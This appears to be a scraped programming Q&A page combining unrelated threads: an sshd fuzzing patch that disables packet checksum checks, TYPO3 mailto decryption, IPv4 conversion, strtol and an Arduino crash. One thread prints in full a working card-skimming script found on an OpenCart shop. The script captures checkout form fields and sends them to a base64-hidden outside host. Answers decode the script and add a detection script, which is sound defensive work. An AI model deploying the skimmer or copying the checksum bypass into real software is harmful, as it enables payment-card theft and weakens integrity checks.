What exactly does 0 && checksum != stored_checksum do? - sshd

http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html
diff --git a/packet.c b/packet.c
--- a/packet.c
+++ b/packet.c
## -1635,7 +1635,7 ## ssh_packet_read_poll1(struct ssh *ssh, u_char *typep)
cp = sshbuf_ptr(state->incoming_packet) + len - 4;
stored_checksum = PEEK_U32(cp);
- if (checksum != stored_checksum) {
+ if (0 && checksum != stored_checksum) {
error("Corrupted check bytes on input");
if ((r = sshpkt_disconnect(ssh, "connection corrupted")) != 0 ||
(r = ssh_packet_write_wait(ssh)) != 0)
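Review bot: the 0 && prefix on the changed if disables the packet checksum test unconditionally, with no comment and no build guard. Because && short-circuits on a zero left operand, checksum != stored_checksum is never evaluated and the error("Corrupted check bytes on input") / sshpkt_disconnect() path below it can no longer run, so packets whose check bytes do not match are accepted. That is what a fuzzing build wants (the patch comes from the fuzzing write-up linked above), but as written it is a plain edit to packet.c. Suggest keeping the original if and placing the bypass behind a build-time guard, with a comment stating that it exists only for fuzzing, so a non-fuzzing build cannot pick it up.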
Can someone please explain what this patch does?
It removes this:
- if (checksum != stored_checksum) {
and adds this:
+ if (0 && checksum != stored_checksum) {
What exactly does 0 && checksum != stored_checksum do?

Related

TYPO3 encrypted mailto-link (javascript:linkTo_UnCryptMailto) not working with subject and body

In TYPO3 mailto links are decrypted by the following code snippet.
Is there a way to use this with mailto links, which contain subject and body text?
e.g.: email@example.org?subject=This is my subject&body=This is my bodytext: more text...etc.
// decrypt helper function
function decryptCharcode(n,start,end,offset) {
    n = n + offset;
    if (offset > 0 && n > end) {
        n = start + (n - end - 1);
    } else if (offset < 0 && n < start) {
        n = end - (start - n - 1);
    }
    return String.fromCharCode(n);
}
// decrypt string
function decryptString(enc,offset) {
    var dec = "";
    var len = enc.length;
    for(var i=0; i < len; i++) {
        var n = enc.charCodeAt(i);
        if (n >= 0x2B && n <= 0x3A) {
            dec += decryptCharcode(n,0x2B,0x3A,offset); // 0-9 . , - + / :
        } else if (n >= 0x40 && n <= 0x5A) {
            dec += decryptCharcode(n,0x40,0x5A,offset); // A-Z @
        } else if (n >= 0x61 && n <= 0x7A) {
            dec += decryptCharcode(n,0x61,0x7A,offset); // a-z
        } else {
            dec += enc.charAt(i);
        }
    }
    return dec;
}
// decrypt spam-protected emails
function linkTo_UnCryptMailto(s) {
    location.href = decryptString(s,-3);
}
if it does not run by default (maybe it depends on usage, from where to what app, but I remember that I used it already).
You might need to encode special characters for usage in URLs.
Try to use PHP function urlencode.
So you could replace all spaces with %20 or +.
Hmm, that works for me (TYPO3 v10).
TypoScript setup:
config.spamProtectEmailAddresses = -3
https://docs.typo3.org/m/typo3/reference-typoscript/master/en-us/Setup/Config/Index.html#spamprotectemailaddresses
Fluid:
<f:link.email email="my@email.tld?subject=123&body=Hello there!">link</f:link.email>
That opens my E-Mail-Client with subject and body (Firefox 84, Thunderbird).

Opencart livechat.js malware script?

I have customer credit card information being stolen from my client's website. I see this livechat.js script running on the website. There is no livechat function on the site, I believe it may be malware. How can I figure out where the script is being initiated from and what exactly is this script doing?
https://www.hergbenet.ro/wp-data/livechat.js
function IrDvbNXumt(e) {
return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g, function(e, t) {
return String.fromCharCode(parseInt(t, 16))
}))
}
function lmVibHTBLP() {
Array.from(document.getElementsByTagName("input")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '0')") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '0');" + e.getAttribute("onchange"))
}), Array.from(document.getElementsByTagName("select")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '1');") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '1');" + e.getAttribute("onchange"))
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this), '2'") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '2');" + e.getAttribute("onchange"))
})
}
function SAcSpFtVQg(e, t) {
var n = [];
n.push("url%" + location.hostname), n.push("type:2"), "1" != t ? e.value.length > 0 && (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n)) : e.value.length > 0 && (-1 != e.id.search("zone|region|state") || -1 != e.name.search("zone|region|state")) ? (e.value.replace(/[^-0-9]/gim, ""), e.value, 0 == e.name.length ? n.push(e.id + "%" + e.options[e.selectedIndex].text) : 0 != e.name.length && n.push(e.name + "%" + e.options[e.selectedIndex].text), aQwCiGbwKo(n)) : (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n))
}
function aQwCiGbwKo(e) {
if (JSON.stringify(KZgKcnPvnh) == JSON.stringify(e)) return !1;
KZgKcnPvnh = e;
var t = 89999 * Math.random() + 1e4,
n = JSON.stringify(e),
a = document.createElement("img");
a.width = "1px", a.height = "1px", a.id = t, a.src = atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=") + "?image_id=" + IrDvbNXumt(n), document.body.appendChild(a), setTimeout(document.getElementById(t).remove(), 3e3)
}
function Default_Send() {
var e = [];
e.push("url%" + location.hostname), e.push("type%2"), Array.from(document.getElementsByTagName("input")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
}), Array.from(document.getElementsByTagName("select")).forEach(function(t, n) {
t.value.length > 0 && (-1 != t.id.search("zone|region|state") || -1 != t.name.search("zone|region|state")) ? (t.value.replace(/[^-0-9]/gim, ""), t.value, 0 == t.name.length ? e.push(t.id + "%" + t.options[t.selectedIndex].text) : 0 != t.name.length && e.push(t.name + "%" + t.options[t.selectedIndex].text)) : 0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value)
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
}), aQwCiGbwKo(e)
}
var KZgKcnPvnh = [];
window.onload = function() {
-1 != location.href.search("checkout") && (Default_Send(), setInterval("Default_Send()", 3e3), setInterval("lmVibHTBLP()", 1500))
};
You should install & run Wordfence Security – Firewall & Malware Scan or Sucuri Security – Auditing, Malware Scanner and Security Hardening and check the results.
For example if you decode this atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=") you will see this url https://valdamarkdirect.com/wp-data/validation.php. Is this something you are aware of?
In most cases like this you should start by stating to your client that the e-Shop is compromised and ask for help from an expert.
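The decoding step from the answer above, generalized into a static triage pass over a suspect script. This is an added example for Node.js, not code from the post; the indicator list, the function names, the sample script and the collector.example / shop.example hosts are constructed for illustration.

```javascript
// Patterns taken from what the posted script visibly does.
const INDICATORS = [
  { name: "enumerates form fields",
    re: /getElementsByTagName\(\s*["'](?:input|select|textarea)["']\s*\)/ },
  { name: "rewrites onchange handlers", re: /setAttribute\(\s*["']onchange["']/ },
  { name: "builds an image beacon", re: /createElement\(\s*["']img["']\s*\)/ },
  { name: "activates on checkout pages",
    re: /location\.href\.search\(\s*["']checkout["']\s*\)/ },
];

// Decode every string literal passed directly to atob().
function decodeAtobLiterals(source) {
  const re = /atob\(\s*["']([A-Za-z0-9+/]+={0,2})["']\s*\)/g;
  return Array.from(source.matchAll(re), (m) =>
    Buffer.from(m[1], "base64").toString("utf8"));
}

// Report decoded literals, hosts other than the shop's own, and matched patterns.
function triageScript(source, siteHost) {
  const decoded = decodeAtobLiterals(source);
  const foreignHosts = [];
  for (const text of decoded) {
    try {
      const host = new URL(text).hostname;
      if (host !== siteHost && !foreignHosts.includes(host)) foreignHosts.push(host);
    } catch {
      // The decoded literal is not a URL; keep it in `decoded` only.
    }
  }
  const indicators = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.name);
  return {
    decoded, foreignHosts, indicators,
    suspicious: foreignHosts.length > 0 && indicators.length >= 2,
  };
}

// Constructed sample that mirrors the structure of the posted script.
const hiddenUrl = Buffer.from("https://collector.example/validation.php").toString("base64");
const SAMPLE = `
function hook(){Array.from(document.getElementsByTagName("input")).forEach(function(e){e.setAttribute("onchange","send(this)")})}
function send(e){var a=document.createElement("img");a.src=atob("${hiddenUrl}")+"?image_id="+btoa(e.value);document.body.appendChild(a)}
window.onload=function(){-1!=location.href.search("checkout")&&setInterval(hook,1500)};
`;

console.log(triageScript(SAMPLE, "shop.example"));
```

Running the same pass over every script the checkout page loads, and then searching the store's templates and database for the file name of a flagged script, helps locate where it is being injected.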

How to get host from IP

I'm working on a function that calculates the decimal equivalent of an IP, in order to get the result I'm using this formula:
decimal = ((octet1 * 16777216) + (octet2 * 65536) + (octet3 * 256) + (octet4))
Does anybody know how to reverse this process? I mean, how can I get the IP address from the decimal number?
I'm looking for some mathematical formula, I already know about nslookup command.
Thanks in advance.
To decimal:
decimal = (octet1 * 256^3) + (octet2 * 256^2) + (octet3 * 256^1) + octet4
To octets:
octet1 = Floor(decimal / 256^3)
octet2 = Floor((decimal - (octet1 * 256^3)) / 256^2)
octet3 = Floor((decimal - (octet1 * 256^3) - (octet2 * 256^2)) / 256^1)
octet4 = decimal - (octet1 * 256^3) - (octet2 * 256^2) - (octet3 * 256^1)
Example using 1.2.3.4
decimal = (1 * 256^3) + (2 * 256^2) + (3 * 256^1) + 4
decimal = 16909060
octet1 = Floor(16909060 / 256^3)
octet1 = 1
octet2 = Floor((16909060 - (1 * 256^3)) / 256^2)
octet2 = 2
octet3 = Floor((16909060 - (1 * 256^3) - (2 * 256^2)) / 256^1)
octet3 = 3
octet4 = 16909060 - (1 * 256^3) - (2 * 256^2) - (3 * 256^1)
octet4 = 4
Implementation Using Go
package main

import (
	"errors"
	"flag"
	"fmt"
	"math"
	"os"
	"strconv"
	"strings"
)

var (
	ip  = flag.String("i", "", "IP address in dotted notation")
	dec = flag.Int("d", 0, "IP address in decimal notation")
)

// ipv4ToDec converts a dotted-quad string to its decimal value.
func ipv4ToDec(ip string) (int, error) {
	var result int
	octets := strings.Split(ip, ".")
	if len(octets) != 4 {
		return 0, errors.New("IP should consist of 4 '.' separated numbers")
	}
	for i := 0; i < 4; i++ {
		v, err := strconv.Atoi(octets[3-i])
		if err != nil {
			return 0, errors.New("unable to convert octet to number")
		}
		if v < 0 || v > 255 {
			return 0, errors.New("octet should be between 0 and 255")
		}
		result += v * int(math.Pow(256, float64(i)))
	}
	return result, nil
}

// decToIpv4 converts a decimal value back to a dotted-quad string.
func decToIpv4(dec int) (string, error) {
	// A negative input would otherwise yield negative octets.
	if dec < 0 {
		return "", errors.New("decimal value must not be negative")
	}
	var octets []string
	for i := 0; i < 4; i++ {
		octet := dec / int(math.Pow(256, float64(3-i)))
		if octet > 255 {
			return "", errors.New("octet larger than 255")
		}
		dec -= octet * int(math.Pow(256, float64(3-i)))
		octets = append(octets, strconv.Itoa(octet))
	}
	return strings.Join(octets, "."), nil
}

func main() {
	flag.Parse()
	if (*ip != "" && *dec != 0) || (*ip == "" && *dec == 0) {
		fmt.Println("Use either -i or -d.")
		os.Exit(1)
	}
	if *ip != "" {
		result, err := ipv4ToDec(*ip)
		if err != nil {
			fmt.Println("Conversion failed: ", err)
			os.Exit(1)
		}
		fmt.Println(result)
	}
	if *dec != 0 {
		result, err := decToIpv4(*dec)
		if err != nil {
			fmt.Println("Conversion failed: ", err)
			os.Exit(1)
		}
		fmt.Println(result)
	}
}
Usage:
$ ./ip-conv -i 1.2.3.4
16909060
$ ./ip-conv -d 16909060
1.2.3.4
$ ./ip-conv -i 192.168.0.1
3232235521
# Using the output of IP->decimal as input to decimal->IP
$ ./ip-conv -d $(./ip-conv -i 192.168.0.1)
192.168.0.1
Multiplying and dividing is a waste of computational power. Remember that you're dealing with bit patterns:
o1.o2.o3.o4 to numeric:
n = o1<<24 | o2<<16 | o3<<8 | o4
numeric to octets:
o1 = n>>24
o2 = (n>>16) & 255
o3 = (n>>8) & 255
o4 = n & 255
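The shift formulas above as a JavaScript example added here (not code from either answer), with the two details they leave out: bitwise results in JavaScript are signed 32-bit, and octets need strict parsing before a converted address is compared against an allow or deny list. All function names are illustrative.

```javascript
function parseOctet(text) {
  // Digits only, no sign, no leading zero: "010" is octal to some parsers
  // and decimal to others, so it is rejected instead of guessed at.
  if (!/^(0|[1-9][0-9]{0,2})$/.test(text)) {
    throw new RangeError("bad octet: " + JSON.stringify(text));
  }
  const value = Number(text);
  if (value > 255) throw new RangeError("octet out of range: " + text);
  return value;
}

function ipv4ToInt(ip) {
  const parts = String(ip).split(".");
  if (parts.length !== 4) throw new RangeError("expected four octets");
  const [o1, o2, o3, o4] = parts.map(parseOctet);
  // Bitwise operators work on signed 32-bit values, so any address with
  // o1 >= 128 comes out negative until >>> 0 reinterprets it as unsigned.
  return ((o1 << 24) | (o2 << 16) | (o3 << 8) | o4) >>> 0;
}

function ipv4ToIntSigned(ip) {
  // Same formula without the final >>> 0, kept only to show the pitfall.
  const [o1, o2, o3, o4] = String(ip).split(".").map(parseOctet);
  return (o1 << 24) | (o2 << 16) | (o3 << 8) | o4;
}

function intToIpv4(n) {
  if (!Number.isInteger(n) || n < 0 || n > 0xffffffff) {
    throw new RangeError("not an unsigned 32-bit integer: " + n);
  }
  return [n >>> 24, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join(".");
}

// Helper for checking that invalid input is refused.
function rejects(fn, arg) {
  try { fn(arg); return false; } catch (e) { return e instanceof RangeError; }
}

console.log(ipv4ToInt("1.2.3.4"), ipv4ToInt("192.168.0.1"), intToIpv4(3232235521));
```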

Strtol implementation different behaviour on 32 and 64 bit machine

#include <ctype.h>
#include <string.h>
#include <stdio.h>
#include <tgmath.h>
#include <limits.h>
#include <stdbool.h>
#include <errno.h>
#define NEGATIVE -1
#define POSITIVE 1
#define OCTAL 8
#define DECIMAL 10
#define HEXADECIMAL 16
#define BASE_MIN 2
#define BASE_MAX 36
long int strtol (const char * str, char ** endPtr, int base)
{
    if(base < 0 || base == 1 || base > BASE_MAX)
    {
        errno = EINVAL;
        return 0L;
    }
    else
    {
        bool conversion = true;
        int i = 0, sign = POSITIVE, save;
        while(isspace(*(str + i)))
            i++;
        if(*(str + i) == '\0')
        {
            conversion = false;
            save = i;
        }
        if(*(str + i) == '-')
        {
            sign = NEGATIVE;
            i++;
        }
        else if(*(str + i) == '+')
            i++;
        if(base == 0) // find out base
        {
            if(*(str + i) == '0')
            {
                if(toupper(*(str + i + 1)) == 'X')
                {
                    base = HEXADECIMAL;
                    i++;
                }
                else
                    base = OCTAL;
                i++;
            }
            else
                base = DECIMAL;
        }
        else if(base == OCTAL)
        {
            if(*(str + i) == '0')
                i++;
        }
        else if(base == HEXADECIMAL)
        {
            if(*(str + i) == '0')
                if(*(str + i + 1) == 'x' || *(str + i + 1) == 'X')
                    i += 2;
        }
        int start = i, end, exp, check = i;
        long int long_int, sum, multiplier;
        if(conversion) // find out the correct part of the string corresponding to the number
        {
            if(base < DECIMAL)
            {
                while(*(str + i) >= '0' && *(str + i) < base + '0') // numbers from 0 to base - 1
                    i++;
            }
            else if(base == DECIMAL)
            {
                while(*(str + i) >= '0' && *(str + i) <= '9') // numbers from 0 to 9
                    i++;
            }
            else
            {
                while((*(str + i) >= '0' && *(str + i) <= '9') || (toupper(*(str + i)) >= 'A' && toupper(*(str + i)) < 'A' + base - 10))
                    i++; // numbers from 0 to 9 and upper and lowercase letters from a to a + base - 11
            }
        }
        if(i == check && conversion) // no digits at all
        {
            conversion = false;
            save = i;
        }
        else if(endPtr != NULL && conversion) // assign pointer
            *endPtr = (char *) (str + i);
        if(conversion)
        {
            for(end = i - 1, exp = 0, long_int = 0L; end >= start; end--, exp++)
            {
                multiplier = pow(base, exp);
                sum = 0L;
                if(*(str + end) >= '0' && *(str + end) <= '9')
                    sum = (*(str + end) - '0') * multiplier;
                else if(*(str + end) >= 'A' && *(str + i) <= (base == BASE_MAX ? 'Z' : 'F'))
                    sum = (*(str + end) - 'A' + 10) * multiplier;
                else if(*(str + end) >= 'a' && *(str + i) <= (base == BASE_MAX ? 'z' : 'f'))
                    sum = (*(str + end) - 'a' + 10) * multiplier;
                if(long_int <= LONG_MIN + sum)
                {
                    errno = ERANGE;
                    return LONG_MIN;
                }
                if(long_int >= LONG_MAX - sum)
                {
                    errno = ERANGE;
                    return LONG_MAX;
                }
                else
                    long_int += sum;
            }
            return sign * long_int;
        }
        else
        {
            if(endPtr != NULL)
            { // if base is 16 we check if the string given is not in the form 0xIncorrect string in that way we need to return xIncorrect part of the string
                if(base == HEXADECIMAL && save >= 2 && toupper(*(str + save - 1)) == 'X' && *(str + save - 2) == '0')
                    *endPtr = (char *) str + save - 1;
                else if(base == OCTAL && save >= 1 && *(str + save - 1) == '0')
                    *endPtr = (char *) str + save; // if the string is of base 8 and in the form 0incorrect string
                else // then we return everything after the 0 as the endptr string
                    *endPtr = (char *) str; // in other cases no conversion was done so we return original pointer
            }
            return 0L;
        }
    }
}
I've got a problem with writing an implementation of the strtol() function. The thing is, I compiled it on a 64-bit machine and the output was correct, but today I checked it on another machine that is 32-bit and something went wrong. The 32-bit machine showed the result that, for example, the string "7FFFFFFF" is out of range, while on 64-bit the result is that strtol succeeded, which is the same as for the standard function. I also checked the errno value, and on the 32-bit machine it's set to ERANGE, which it shouldn't be, and it's not on 64-bit. I have a program that checks if your implementation gives the same output as the standard one for different strings. I spent a few hours looking for a possible bug but I'm out of ideas. Any tips?

Arduino multi-dimensional array crash

I have a block of code that does something to this effect:
int pieceX = 0;
int pieceY = 0;
int board[8][47] = {{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}};
if (pieceX > 0 && pieceY < 46) {
    /* If I remove this it doesn't crash */
    if (board[pieceX-1][pieceY] == 0 && board[pieceX][pieceY+1] == 0) {
        pieceX -= 1;
    }
    /*-----------------------------------*/
}
As far as I can tell, I'm initializing my array correctly and I'm staying within the index bounds. I don't work much with Processing or Arduino, so I'm hoping it's something simple / obvious.
Edit: Hmm.. I just made a minimalistic test version with this code, and it doesn't crash. So, it's something to do with the code not in this example. Damn. Going to try to zero in on those lines. (My bad for posting this before properly isolating the problem code.) While this accurately describes the problem, it does not reproduce it. Strange bug.
Edit 2: This doesn't crash:
if (buttonA == HIGH) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        if (board[0][0] == 0) {
        }
    }
}
This doesn't crash:
if (buttonA == HIGH) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        pieceX -= 1;
    }
}
This DOES crash:
if (buttonA == HIGH) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        if (board[0][0] == 0) {
            pieceX -= 1;
        }
    }
}
Any idea what's going on? ButtonA is never HIGH, so.. the code I'm tweaking shouldn't even matter (it all verifies and uploads fine.)
Edit 3: This crashes:
if (buttonA == HIGH) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        if (board[0][0] == 0) {
            pieceX -= 1;
        }
    }
}
This DOES NOT:
if (0 == 1) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        if (board[0][0] == 0) {
            pieceX -= 1;
        }
    }
}
This crashes:
if (buttonA == HIGH) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        if (board[0][0] == 0) {
            pieceX = 1;
        }
    }
}
This DOES NOT:
if (buttonA == HIGH) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        pieceX = 1;
    }
}
AND THIS DOES NOT:
if (buttonA == HIGH) {
    if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
        if (board[0][0] == 0) {
        }
    }
}
Edit, here's the full source code. I'm only a few hours into a black and white Dr Mario clone. I never write in this language, so.. potentially a bit sloppy. More of a random learning experiment in processing / video game hardware / arduino.
Since the issue seems to be erratic, I would guess you are corrupting your stack.
I am not sure which Arduino you are using and how many other variables you have defined.
The array you are creating is 8 * 47 * 2 = 752 bytes, the Arduino Uno has 2048 ram bytes for the stack and all of your variables.
Edit:
Can you temporarily reduce the size of the array (maybe 4 * 10) to see if it stops crashing?
Another test you could do is to list the values before you modify them and verify they are all 0.
This definitely looks like you are running out of memory.
int board[8][47]
consumes 752 bytes of memory. In addition
TV.begin(NTSC,120,96);
will call
char TVout::begin(uint8_t mode, uint8_t x, uint8_t y) {
    // check if x is divisible by 8
    if ( !(x & 0xF8))
        return 1;
    x = x/8;
    screen = (unsigned char*)malloc(x * y * sizeof(unsigned char));
which tries to allocate 1440 bytes of memory. 1440 + 752 == 2192 > 2048 == SRAM size of Arduino
So you are running out of memory.
Can you switch int board[8][47] from int to int8_t or uint8_t? This would reduce the memory consumption of the array by 2. However you would still be very tight on memory.
This definitely looks like you are running out of memory.
You might be able to use less memory.
It looks like any given board element is either a 0 or 1.
If I am wrong disregard the rest of my statement.
Else you "could" make an array like this.
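char board [47];
const unsigned char first = 0b00000001; // binary mask, for binary and
const unsigned char second = 0b00000010;
const unsigned char third = 0b00000100;
...
Then to look up any bit you
if ((board[33] & second) == 0) // == binds tighter than &, so the parentheses are required; this tests what was board[1][33]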
This might help you out.
